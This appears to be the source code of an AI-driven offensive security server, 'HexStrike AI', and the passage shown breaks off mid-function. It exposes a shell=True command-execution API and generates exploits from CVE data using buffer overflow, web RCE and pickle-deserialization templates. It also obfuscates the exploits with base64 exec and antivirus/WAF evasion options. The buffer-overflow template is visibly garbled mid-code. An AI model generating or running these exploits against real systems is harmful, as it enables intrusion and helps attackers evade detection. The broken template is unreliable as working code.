#!/usr/bin/env python3 import argparse import json import logging import os import subprocess import sys import traceback import threading import time import hashlib import pickle import base64 from datetime import datetime, timedelta from typing import Dict, Any, Optional from collections import OrderedDict import shutil import venv import zipfile from pathlib import Path from flask import Flask, request, jsonify import psutil import signal import requests # ============================================================================ # PROCESS MANAGEMENT FOR COMMAND TERMINATION (v5.0 ENHANCEMENT) # ============================================================================ # Process management for command termination active_processes = {} # pid -> process info process_lock = threading.Lock() class ProcessManager: """Enhanced process manager for command termination and monitoring""" @staticmethod def register_process(pid, command, process_obj): """Register a new active process""" with process_lock: active_processes[pid] = { "pid": pid, "command": command, "process": process_obj, "start_time": time.time(), "status": "running", "progress": 0.0, "last_output": "", "bytes_processed": 0 } logger.info(f"πŸ†” REGISTERED: Process {pid} - {command[:50]}...") @staticmethod def update_process_progress(pid, progress, last_output="", bytes_processed=0): """Update process progress and stats""" with process_lock: if pid in active_processes: active_processes[pid]["progress"] = progress active_processes[pid]["last_output"] = last_output active_processes[pid]["bytes_processed"] = bytes_processed runtime = time.time() - active_processes[pid]["start_time"] # Calculate ETA if progress > 0 eta = 0 if progress > 0: eta = (runtime / progress) * (1.0 - progress) active_processes[pid]["runtime"] = runtime active_processes[pid]["eta"] = eta @staticmethod def terminate_process(pid): """Terminate a specific process""" with process_lock: if pid in active_processes: process_info = active_processes[pid] try: process_obj = process_info["process"] if process_obj and process_obj.poll() is None: process_obj.terminate() time.sleep(1) # Give it a chance to terminate gracefully if process_obj.poll() is None: process_obj.kill() # Force kill if still running active_processes[pid]["status"] = "terminated" logger.warning(f"πŸ›‘ TERMINATED: Process {pid} - {process_info['command'][:50]}...") return True except Exception as e: logger.error(f"πŸ’₯ Error terminating process {pid}: {str(e)}") return False return False @staticmethod def cleanup_process(pid): """Remove process from active registry""" with process_lock: if pid in active_processes: process_info = active_processes.pop(pid) logger.info(f"🧹 CLEANUP: Process {pid} removed from registry") return process_info return None @staticmethod def get_process_status(pid): """Get status of a specific process""" with process_lock: return active_processes.get(pid, None) @staticmethod def list_active_processes(): """List all active processes""" with process_lock: return dict(active_processes) @staticmethod def pause_process(pid): """Pause a specific process (SIGSTOP)""" with process_lock: if pid in active_processes: try: process_obj = active_processes[pid]["process"] if process_obj and process_obj.poll() is None: os.kill(pid, signal.SIGSTOP) active_processes[pid]["status"] = "paused" logger.info(f"⏸️ PAUSED: Process {pid}") return True except Exception as e: logger.error(f"πŸ’₯ Error pausing process {pid}: {str(e)}") return False @staticmethod def resume_process(pid): """Resume a paused process (SIGCONT)""" with process_lock: if pid in active_processes: try: process_obj = active_processes[pid]["process"] if process_obj and process_obj.poll() is None: os.kill(pid, signal.SIGCONT) active_processes[pid]["status"] = "running" logger.info(f"▢️ RESUMED: Process {pid}") return True except Exception as e: logger.error(f"πŸ’₯ Error resuming process {pid}: {str(e)}") return False # HexStrike AI Banner BANNER = r""" β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β•šβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— β•šβ•β•β•β•β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β•β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β• β•šβ•β•β•šβ•β•β•β•β•β•β• β•šβ•β• β•šβ•β•β•šβ•β• HexStrike AI - Advanced Cybersecurity Automation Platform Developed by: 0x4m4 (www.0x4m4.com) (www.hexstrike.com) Version: 5.0.0 Agents πŸš€ Powerful AI-driven API Server for offensive security tools πŸ›‘οΈ Advanced caching, real-time telemetry, and enhanced logging ⚑ Cloud security, file operations, and environment management 🎯 Process management, CTF tools, and bug bounty arsenal """ # Color codes for terminal output class Colors: RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' BLUE = '\033[94m' MAGENTA = '\033[95m' CYAN = '\033[96m' WHITE = '\033[97m' BOLD = '\033[1m' RESET = '\033[0m' # Configure enhanced logging with colors class ColoredFormatter(logging.Formatter): """Custom formatter with colors and emojis""" COLORS = { 'DEBUG': Colors.CYAN, 'INFO': Colors.GREEN, 'WARNING': Colors.YELLOW, 'ERROR': Colors.RED, 'CRITICAL': Colors.MAGENTA + Colors.BOLD } EMOJIS = { 'DEBUG': 'πŸ”', 'INFO': 'βœ…', 'WARNING': '⚠️', 'ERROR': '❌', 'CRITICAL': 'πŸ”₯' } def format(self, record): emoji = self.EMOJIS.get(record.levelname, 'πŸ“') color = self.COLORS.get(record.levelname, Colors.WHITE) # Add color and emoji to the message record.msg = f"{color}{emoji} {record.msg}{Colors.RESET}" return super().format(record) # Enhanced logging setup def setup_logging(): """Setup enhanced logging with colors and formatting""" logger = logging.getLogger() logger.setLevel(logging.INFO) # Clear existing handlers for handler in logger.handlers[:]: logger.removeHandler(handler) # Console handler with colors console_handler = logging.StreamHandler(sys.stdout) console_handler.setFormatter(ColoredFormatter( "[πŸ”₯ HexStrike AI] %(asctime)s [%(levelname)s] %(message)s", datefmt="%Y-%m-%d %H:%M:%S" )) logger.addHandler(console_handler) return logger logger = setup_logging() # Configuration API_PORT = int(os.environ.get("API_PORT", 5000)) DEBUG_MODE = os.environ.get("DEBUG_MODE", "0").lower() in ("1", "true", "yes", "y") COMMAND_TIMEOUT = 300 # 5 minutes default timeout CACHE_SIZE = 1000 CACHE_TTL = 3600 # 1 hour app = Flask(__name__) class HexStrikeCache: """Advanced caching system for command results""" def __init__(self, max_size: int = CACHE_SIZE, ttl: int = CACHE_TTL): self.cache = OrderedDict() self.max_size = max_size self.ttl = ttl self.stats = {"hits": 0, "misses": 0, "evictions": 0} def _generate_key(self, command: str, params: Dict[str, Any]) -> str: """Generate cache key from command and parameters""" key_data = f"{command}:{json.dumps(params, sort_keys=True)}" return hashlib.md5(key_data.encode()).hexdigest() def _is_expired(self, timestamp: float) -> bool: """Check if cache entry is expired""" return time.time() - timestamp > self.ttl def get(self, command: str, params: Dict[str, Any]) -> Optional[Dict[str, Any]]: """Get cached result if available and not expired""" key = self._generate_key(command, params) if key in self.cache: timestamp, data = self.cache[key] if not self._is_expired(timestamp): # Move to end (most recently used) self.cache.move_to_end(key) self.stats["hits"] += 1 logger.info(f"πŸ’Ύ Cache HIT for command: {command}") return data else: # Remove expired entry del self.cache[key] self.stats["misses"] += 1 logger.info(f"πŸ” Cache MISS for command: {command}") return None def set(self, command: str, params: Dict[str, Any], result: Dict[str, Any]): """Store result in cache""" key = self._generate_key(command, params) # Remove oldest entries if cache is full while len(self.cache) >= self.max_size: oldest_key = next(iter(self.cache)) del self.cache[oldest_key] self.stats["evictions"] += 1 self.cache[key] = (time.time(), result) logger.info(f"πŸ’Ύ Cached result for command: {command}") def get_stats(self) -> Dict[str, Any]: """Get cache statistics""" total_requests = self.stats["hits"] + self.stats["misses"] hit_rate = (self.stats["hits"] / total_requests * 100) if total_requests > 0 else 0 return { "size": len(self.cache), "max_size": self.max_size, "hit_rate": f"{hit_rate:.1f}%", "hits": self.stats["hits"], "misses": self.stats["misses"], "evictions": self.stats["evictions"] } # Global cache instance cache = HexStrikeCache() class TelemetryCollector: """Collect and manage system telemetry""" def __init__(self): self.stats = { "commands_executed": 0, "successful_commands": 0, "failed_commands": 0, "total_execution_time": 0.0, "start_time": time.time() } def record_execution(self, success: bool, execution_time: float): """Record command execution statistics""" self.stats["commands_executed"] += 1 if success: self.stats["successful_commands"] += 1 else: self.stats["failed_commands"] += 1 self.stats["total_execution_time"] += execution_time def get_system_metrics(self) -> Dict[str, Any]: """Get current system metrics""" return { "cpu_percent": psutil.cpu_percent(interval=1), "memory_percent": psutil.virtual_memory().percent, "disk_usage": psutil.disk_usage('/').percent, "network_io": psutil.net_io_counters()._asdict() if psutil.net_io_counters() else {} } def get_stats(self) -> Dict[str, Any]: """Get telemetry statistics""" uptime = time.time() - self.stats["start_time"] success_rate = (self.stats["successful_commands"] / self.stats["commands_executed"] * 100) if self.stats["commands_executed"] > 0 else 0 avg_execution_time = (self.stats["total_execution_time"] / self.stats["commands_executed"]) if self.stats["commands_executed"] > 0 else 0 return { "uptime_seconds": uptime, "commands_executed": self.stats["commands_executed"], "success_rate": f"{success_rate:.1f}%", "average_execution_time": f"{avg_execution_time:.2f}s", "system_metrics": self.get_system_metrics() } # Global telemetry collector telemetry = TelemetryCollector() class EnhancedCommandExecutor: """Enhanced command executor with caching, progress tracking, and better output handling""" def __init__(self, command: str, timeout: int = COMMAND_TIMEOUT): self.command = command self.timeout = timeout self.process = None self.stdout_data = "" self.stderr_data = "" self.stdout_thread = None self.stderr_thread = None self.return_code = None self.timed_out = False self.start_time = None self.end_time = None def _read_stdout(self): """Thread function to continuously read and display stdout""" try: for line in iter(self.process.stdout.readline, ''): if line: self.stdout_data += line # Real-time output display logger.info(f"πŸ“€ STDOUT: {line.strip()}") except Exception as e: logger.error(f"Error reading stdout: {e}") def _read_stderr(self): """Thread function to continuously read and display stderr""" try: for line in iter(self.process.stderr.readline, ''): if line: self.stderr_data += line # Real-time error output display logger.warning(f"πŸ“₯ STDERR: {line.strip()}") except Exception as e: logger.error(f"Error reading stderr: {e}") def _show_progress(self, duration: float): """Show enhanced progress indication for long-running commands""" if duration > 2: # Show progress for commands taking more than 2 seconds progress_chars = ['β£Ύ', 'β£½', 'β£»', 'β’Ώ', 'β‘Ώ', '⣟', 'β£―', 'β£·'] start = time.time() i = 0 while self.process and self.process.poll() is None: elapsed = time.time() - start char = progress_chars[i % len(progress_chars)] # Calculate progress percentage (rough estimate) progress_percent = min((elapsed / self.timeout) * 100, 99.9) # Create progress bar bar_length = 20 filled_length = int(bar_length * progress_percent / 100) bar = 'β–ˆ' * filled_length + 'β–‘' * (bar_length - filled_length) # Calculate ETA if progress_percent > 5: # Only show ETA after 5% progress eta = ((elapsed / progress_percent) * 100) - elapsed eta_str = f" | ETA: {eta:.0f}s" else: eta_str = " | ETA: Calculating..." # Update process manager with progress ProcessManager.update_process_progress( self.process.pid, progress_percent / 100, f"Running for {elapsed:.1f}s", len(self.stdout_data) + len(self.stderr_data) ) logger.info(f"⚑ PROGRESS {char} [{bar}] {progress_percent:.1f}% | {elapsed:.1f}s{eta_str} | PID: {self.process.pid}") time.sleep(0.8) i += 1 if elapsed > self.timeout: break def execute(self) -> Dict[str, Any]: """Execute the command with enhanced monitoring and output""" self.start_time = time.time() logger.info(f"πŸš€ EXECUTING: {self.command}") logger.info(f"⏱️ TIMEOUT: {self.timeout}s | PID: Starting...") try: self.process = subprocess.Popen( self.command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, bufsize=1 ) pid = self.process.pid logger.info(f"πŸ†” PROCESS: PID {pid} started") # Register process with ProcessManager (v5.0 enhancement) ProcessManager.register_process(pid, self.command, self.process) # Start threads to read output continuously self.stdout_thread = threading.Thread(target=self._read_stdout) self.stderr_thread = threading.Thread(target=self._read_stderr) self.stdout_thread.daemon = True self.stderr_thread.daemon = True self.stdout_thread.start() self.stderr_thread.start() # Start progress tracking in a separate thread progress_thread = threading.Thread(target=self._show_progress, args=(self.timeout,)) progress_thread.daemon = True progress_thread.start() # Wait for the process to complete or timeout try: self.return_code = self.process.wait(timeout=self.timeout) self.end_time = time.time() # Process completed, join the threads self.stdout_thread.join(timeout=1) self.stderr_thread.join(timeout=1) execution_time = self.end_time - self.start_time # Cleanup process from registry (v5.0 enhancement) ProcessManager.cleanup_process(pid) if self.return_code == 0: logger.info(f"βœ… SUCCESS: Command completed | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(True, execution_time) else: logger.warning(f"⚠️ WARNING: Command completed with errors | Exit Code: {self.return_code} | Duration: {execution_time:.2f}s") telemetry.record_execution(False, execution_time) except subprocess.TimeoutExpired: self.end_time = time.time() execution_time = self.end_time - self.start_time # Process timed out but we might have partial results self.timed_out = True logger.warning(f"⏰ TIMEOUT: Command timed out after {self.timeout}s | Terminating PID {self.process.pid}") # Try to terminate gracefully first self.process.terminate() try: self.process.wait(timeout=5) except subprocess.TimeoutExpired: # Force kill if it doesn't terminate logger.error(f"πŸ”ͺ FORCE KILL: Process {self.process.pid} not responding to termination") self.process.kill() self.return_code = -1 telemetry.record_execution(False, execution_time) # Always consider it a success if we have output, even with timeout success = True if self.timed_out and (self.stdout_data or self.stderr_data) else (self.return_code == 0) # Log enhanced final results with summary output_size = len(self.stdout_data) + len(self.stderr_data) execution_time = self.end_time - self.start_time if self.end_time else 0 # Create status summary status_icon = "βœ…" if success else "❌" timeout_status = " [TIMEOUT]" if self.timed_out else "" logger.info(f"πŸ“Š FINAL RESULTS {status_icon}") logger.info(f" β”œβ”€ Command: {self.command[:60]}{'...' if len(self.command) > 60 else ''}") logger.info(f" β”œβ”€ Duration: {execution_time:.2f}s{timeout_status}") logger.info(f" β”œβ”€ Output Size: {output_size} bytes") logger.info(f" β”œβ”€ Exit Code: {self.return_code}") logger.info(f" └─ Status: {'SUCCESS' if success else 'FAILED'} | Cached: Yes") return { "stdout": self.stdout_data, "stderr": self.stderr_data, "return_code": self.return_code, "success": success, "timed_out": self.timed_out, "partial_results": self.timed_out and (self.stdout_data or self.stderr_data), "execution_time": self.end_time - self.start_time if self.end_time else 0, "timestamp": datetime.now().isoformat() } except Exception as e: self.end_time = time.time() execution_time = self.end_time - self.start_time if self.start_time else 0 logger.error(f"πŸ’₯ ERROR: Command execution failed: {str(e)}") logger.error(f"πŸ” TRACEBACK: {traceback.format_exc()}") telemetry.record_execution(False, execution_time) return { "stdout": self.stdout_data, "stderr": f"Error executing command: {str(e)}\n{self.stderr_data}", "return_code": -1, "success": False, "timed_out": False, "partial_results": bool(self.stdout_data or self.stderr_data), "execution_time": execution_time, "timestamp": datetime.now().isoformat() } class PythonEnvironmentManager: """Manage Python virtual environments and dependencies""" def __init__(self, base_dir: str = "/tmp/hexstrike_envs"): self.base_dir = Path(base_dir) self.base_dir.mkdir(exist_ok=True) def create_venv(self, env_name: str) -> Path: """Create a new virtual environment""" env_path = self.base_dir / env_name if not env_path.exists(): logger.info(f"🐍 Creating virtual environment: {env_name}") venv.create(env_path, with_pip=True) return env_path def install_package(self, env_name: str, package: str) -> bool: """Install a package in the specified environment""" env_path = self.create_venv(env_name) pip_path = env_path / "bin" / "pip" try: result = subprocess.run([str(pip_path), "install", package], capture_output=True, text=True, timeout=300) if result.returncode == 0: logger.info(f"πŸ“¦ Installed package {package} in {env_name}") return True else: logger.error(f"❌ Failed to install {package}: {result.stderr}") return False except Exception as e: logger.error(f"πŸ’₯ Error installing package {package}: {e}") return False def get_python_path(self, env_name: str) -> str: """Get Python executable path for environment""" env_path = self.create_venv(env_name) return str(env_path / "bin" / "python") # Global environment manager env_manager = PythonEnvironmentManager() # ============================================================================ # ADVANCED VULNERABILITY INTELLIGENCE SYSTEM (v6.0 ENHANCEMENT) # ============================================================================ class CVEIntelligenceManager: """CVE database integration and real-time vulnerability monitoring""" def __init__(self): self.nvd_api_url = "https://services.nvd.nist.gov/rest/json/cves/2.0" self.exploitdb_api_url = "https://gitlab.com/exploit-database/exploitdb/-/raw/main/files_exploits.csv" self.github_api_url = "https://api.github.com/search/repositories" self.cache_ttl = 3600 # 1 hour cache for CVE data def fetch_latest_cves(self, hours=24, severity_filter="HIGH,CRITICAL"): """Fetch latest CVEs from NVD with filtering""" try: from datetime import datetime, timedelta import requests # Calculate time range end_time = datetime.now() start_time = end_time - timedelta(hours=hours) # Format dates for NVD API start_date = start_time.strftime("%Y-%m-%dT%H:%M:%S.000") end_date = end_time.strftime("%Y-%m-%dT%H:%M:%S.000") params = { "pubStartDate": start_date, "pubEndDate": end_date, "resultsPerPage": 100 } response = requests.get(self.nvd_api_url, params=params, timeout=30) response.raise_for_status() cve_data = response.json() vulnerabilities = cve_data.get("vulnerabilities", []) # Filter by severity severity_levels = [s.strip() for s in severity_filter.split(",")] filtered_cves = [] for vuln in vulnerabilities: cve_item = vuln.get("cve", {}) metrics = cve_item.get("metrics", {}) # Extract CVSS score cvss_score = 0.0 severity = "UNKNOWN" if "cvssMetricV31" in metrics: cvss_data = metrics["cvssMetricV31"][0]["cvssData"] cvss_score = cvss_data.get("baseScore", 0.0) severity = cvss_data.get("baseSeverity", "UNKNOWN") elif "cvssMetricV30" in metrics: cvss_data = metrics["cvssMetricV30"][0]["cvssData"] cvss_score = cvss_data.get("baseScore", 0.0) severity = cvss_data.get("baseSeverity", "UNKNOWN") if severity in severity_levels or "ALL" in severity_levels: filtered_cves.append({ "cve_id": cve_item.get("id", ""), "description": cve_item.get("descriptions", [{}])[0].get("value", ""), "cvss_score": cvss_score, "severity": severity, "published_date": cve_item.get("published", ""), "last_modified": cve_item.get("lastModified", ""), "references": [ref.get("url", "") for ref in cve_item.get("references", [])] }) return { "success": True, "total_cves": len(filtered_cves), "cves": filtered_cves, "timeframe": f"{hours} hours", "severity_filter": severity_filter } except Exception as e: logger.error(f"Error fetching CVEs: {str(e)}") return { "success": False, "error": str(e), "cves": [] } def analyze_cve_exploitability(self, cve_id): """AI-powered analysis of CVE exploitability""" try: # Fetch CVE details cve_url = f"{self.nvd_api_url}?cveId={cve_id}" response = requests.get(cve_url, timeout=30) response.raise_for_status() cve_data = response.json() if not cve_data.get("vulnerabilities"): return {"success": False, "error": "CVE not found"} vuln = cve_data["vulnerabilities"][0]["cve"] # Analyze exploitability factors exploitability_score = 0 factors = [] # Check for remote exploitation descriptions = vuln.get("descriptions", []) desc_text = " ".join([d.get("value", "") for d in descriptions]).lower() if any(keyword in desc_text for keyword in ["remote", "network", "unauthenticated"]): exploitability_score += 30 factors.append("Remote exploitation possible") if any(keyword in desc_text for keyword in ["code execution", "rce", "arbitrary code"]): exploitability_score += 40 factors.append("Code execution vulnerability") if any(keyword in desc_text for keyword in ["buffer overflow", "heap overflow", "stack overflow"]): exploitability_score += 25 factors.append("Memory corruption vulnerability") if any(keyword in desc_text for keyword in ["injection", "sql", "command", "script"]): exploitability_score += 35 factors.append("Injection vulnerability") # Check CVSS metrics for exploitability metrics = vuln.get("metrics", {}) if "cvssMetricV31" in metrics: cvss = metrics["cvssMetricV31"][0]["cvssData"] if cvss.get("attackVector") == "NETWORK": exploitability_score += 20 factors.append("Network attack vector") if cvss.get("attackComplexity") == "LOW": exploitability_score += 15 factors.append("Low attack complexity") if cvss.get("privilegesRequired") == "NONE": exploitability_score += 25 factors.append("No privileges required") # Determine exploitability level if exploitability_score >= 80: level = "CRITICAL" elif exploitability_score >= 60: level = "HIGH" elif exploitability_score >= 40: level = "MEDIUM" else: level = "LOW" return { "success": True, "cve_id": cve_id, "exploitability_score": exploitability_score, "exploitability_level": level, "factors": factors, "recommendation": self._get_exploit_recommendation(level, factors) } except Exception as e: logger.error(f"Error analyzing CVE {cve_id}: {str(e)}") return {"success": False, "error": str(e)} def _get_exploit_recommendation(self, level, factors): """Get exploitation recommendation based on analysis""" if level == "CRITICAL": return "Immediate exploitation possible - High priority for red team testing" elif level == "HIGH": return "Likely exploitable - Good candidate for weaponization" elif level == "MEDIUM": return "Potentially exploitable - Requires further analysis" else: return "Low exploitation probability - Consider for information gathering" def search_existing_exploits(self, cve_id): """Search for existing exploits across multiple sources""" try: results = { "cve_id": cve_id, "exploits_found": [], "sources_checked": ["exploit-db", "github", "metasploit"] } # Search GitHub for PoCs try: github_params = { "q": f"{cve_id} exploit proof concept poc", "type": "repositories", "sort": "updated" } github_response = requests.get(self.github_api_url, params=github_params, timeout=15) if github_response.status_code == 200: github_data = github_response.json() for repo in github_data.get("items", [])[:5]: # Limit to top 5 results["exploits_found"].append({ "source": "github", "title": repo.get("name", ""), "url": repo.get("html_url", ""), "description": repo.get("description", ""), "stars": repo.get("stargazers_count", 0), "last_updated": repo.get("updated_at", "") }) except Exception as e: logger.warning(f"GitHub search failed: {str(e)}") # Check local exploit database files (if available) exploit_keywords = [cve_id.lower(), cve_id.replace("-", "")] local_exploits = self._search_local_exploits(exploit_keywords) results["exploits_found"].extend(local_exploits) return { "success": True, "results": results, "total_exploits": len(results["exploits_found"]) } except Exception as e: logger.error(f"Error searching exploits for {cve_id}: {str(e)}") return {"success": False, "error": str(e)} def _search_local_exploits(self, keywords): """Search local exploit database""" # This would search local copies of exploit databases # For now, return empty list - can be enhanced with local DB integration return [] class AIExploitGenerator: """AI-powered exploit development and enhancement system""" def __init__(self): # Extend existing payload templates self.exploit_templates = { "buffer_overflow": { "x86": """ # Buffer Overflow Exploit Template for {cve_id} # Target: {target_info} # Architecture: x86 import struct import socket def create_exploit(): # Vulnerability details from {cve_id} target_ip = "{target_ip}" target_port = {target_port} # Buffer overflow payload padding = "A" * {offset} eip_control = struct.pack(" ") sys.exit(1) result = exploit_rce(sys.argv[1], sys.argv[2]) if result: print("Exploit successful!") print(result) """, "deserialization": """ # Deserialization Exploit for {cve_id} # Target: {target_info} import pickle import base64 import requests class ExploitPayload: def __reduce__(self): return (eval, ('{command}',)) def create_malicious_payload(command): payload = ExploitPayload() serialized = pickle.dumps(payload) encoded = base64.b64encode(serialized).decode() return encoded def send_exploit(target_url, command): payload = create_malicious_payload(command) data = {{ "{parameter_name}": payload }} response = requests.post(target_url, data=data) return response.text """ } self.evasion_techniques = { "encoding": ["url", "base64", "hex", "unicode"], "obfuscation": ["variable_renaming", "string_splitting", "comment_injection"], "av_evasion": ["encryption", "packing", "metamorphism"], "waf_bypass": ["case_variation", "parameter_pollution", "header_manipulation"] } def generate_exploit_from_cve(self, cve_data, target_info): """Generate working exploit from CVE data""" try: cve_id = cve_data.get("cve_id", "") description = cve_data.get("description", "").lower() # Determine vulnerability type vuln_type = self._classify_vulnerability(description) exploit_template = self._select_template(vuln_type, target_info) # Generate exploit parameters exploit_params = self._generate_exploit_parameters(cve_data, target_info, vuln_type) # Fill template with parameters exploit_code = exploit_template.format(**exploit_params) # Apply evasion techniques if requested if target_info.get("evasion_level", "none") != "none": exploit_code = self._apply_evasion_techniques(exploit_code, target_info) return { "success": True, "cve_id": cve_id, "vulnerability_type": vuln_type, "exploit_code": exploit_code, "parameters": exploit_params, "instructions": self._generate_usage_instructions(vuln_type, exploit_params), "evasion_applied": target_info.get("evasion_level", "none") } except Exception as e: logger.error(f"Error generating exploit: {str(e)}") return {"success": False, "error": str(e)} def _classify_vulnerability(self, description): """Classify vulnerability type from description""" if any(keyword in description for keyword in ["buffer overflow", "heap overflow", "stack overflow"]): return "buffer_overflow" elif any(keyword in description for keyword in ["code execution", "command injection", "rce"]): return "web_rce" elif any(keyword in description for keyword in ["deserialization", "unserialize", "pickle"]): return "deserialization" elif any(keyword in description for keyword in ["sql injection", "sqli"]): return "sql_injection" elif any(keyword in description for keyword in ["xss", "cross-site scripting"]): return "xss" else: return "generic" def _select_template(self, vuln_type, target_info): """Select appropriate exploit template""" if vuln_type == "buffer_overflow": arch = target_info.get("target_arch", "x86") return self.exploit_templates["buffer_overflow"].get(arch, self.exploit_templates["buffer_overflow"]["x86"]) elif vuln_type in self.exploit_templates: return self.exploit_templates[vuln_type] else: return "# Generic exploit template for {cve_id}\n# Manual development required" def _generate_exploit_parameters(self, cve_data, target_info, vuln_type): """Generate parameters for exploit template""" params = { "cve_id": cve_data.get("cve_id", ""), "target_info": target_info.get("description", "Unknown target"), "target_ip": target_info.get("target_ip", "192.168.1.100"), "target_port": target_info.get("target_port", 80), "command": target_info.get("command", "id"), } if vuln_type == "buffer_overflow": params.update({ "offset": target_info.get("offset", 268), "ret_address": target_info.get("ret_address", "0x41414141"), "nop_size": target_info.get("nop_size", 16), "shellcode": target_info.get("shellcode", '"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68"'), "shellcode_type": target_info.get("shellcode_type", "linux/x86/exec"), "rop_gadgets": target_info.get("rop_gadgets", "0x41414141, 0x42424242") }) elif vuln_type == "web_rce": params.update({ "content_type": target_info.get("content_type", "application/x-www-form-urlencoded"), "injection_payload": target_info.get("injection_payload", '{"cmd": command}'), "parameter_name": target_info.get("parameter_name", "data") }) return params def _apply_evasion_techniques(self, exploit_code, target_info): """Apply evasion techniques to exploit code""" evasion_level = target_info.get("evasion_level", "basic") if evasion_level == "basic": # Simple string obfuscation exploit_code = exploit_code.replace('"', "'") exploit_code = f"# Obfuscated exploit\n{exploit_code}" elif evasion_level == "advanced": # Advanced obfuscation exploit_code = self._advanced_obfuscation(exploit_code) return exploit_code def _advanced_obfuscation(self, code): """Apply advanced obfuscation techniques""" # This is a simplified version - real implementation would be more sophisticated obfuscated = f""" # Advanced evasion techniques applied import base64 exec(base64.b64decode('{base64.b64encode(code.encode()).decode()}')) """ return obfuscated def _generate_usage_instructions(self, vuln_type, params): """Generate usage instructions for the exploit""" instructions = [ f"# Exploit for CVE {params['cve_id']}", f"# Vulnerability Type: {vuln_type}", "", "## Usage Instructions:", "1. Ensure target is vulnerable to this CVE", "2. Adjust target parameters as needed", "3. Test in controlled environment first", "4. Execute with appropriate permissions", "", "## Testing:", f"python3 exploit.py {params.get('target_ip', '')} {params.get('target_port', '')}" ] if vuln_type == "buffer_overflow": instructions.extend([ "", "## Buffer Overflow Notes:", f"- Offset: {params.get('offset', 'Unknown')}", f"- Return address: {params.get('ret_address', 'Unknown')}", "- Verify addresses match target binary", "- Disable ASLR for testing: echo 0 > /proc/sys/kernel/randomize_va_space" ]) return "\n".join(instructions) class VulnerabilityCorrelator: """Correlate vulnerabilities for multi-stage attack chain discovery""" def __init__(self): self.attack_patterns = { "privilege_escalation": ["local", "kernel", "suid", "sudo"], "remote_execution": ["remote", "network", "rce", "code execution"], "persistence": ["service", "registry", "scheduled", "startup"], "lateral_movement": ["smb", "wmi", "ssh", "rdp"], "data_exfiltration": ["file", "database", "memory", "network"] } self.software_relationships = { "windows": ["iis", "office", "exchange", "sharepoint"], "linux": ["apache", "nginx", "mysql", "postgresql"], "web": ["php", "nodejs", "python", "java"], "database": ["mysql", "postgresql", "oracle", "mssql"] } def find_attack_chains(self, target_software, max_depth=3): """Find multi-vulnerability attack chains""" try: # This is a simplified implementation # Real version would use graph algorithms and ML chains = [] # Example attack chain discovery logic base_software = target_software.lower() # Find initial access vulnerabilities initial_vulns = self._find_vulnerabilities_by_pattern(base_software, "remote_execution") for initial_vuln in initial_vulns[:3]: # Limit for demo chain = { "chain_id": f"chain_{len(chains) + 1}", "target": target_software, "stages": [ { "stage": 1, "objective": "Initial Access", "vulnerability": initial_vuln, "success_probability": 0.75 } ], "overall_probability": 0.75, "complexity": "MEDIUM" } # Find privilege escalation priv_esc_vulns = self._find_vulnerabilities_by_pattern(base_software, "privilege_escalation") if priv_esc_vulns: chain["stages"].append({ "stage": 2, 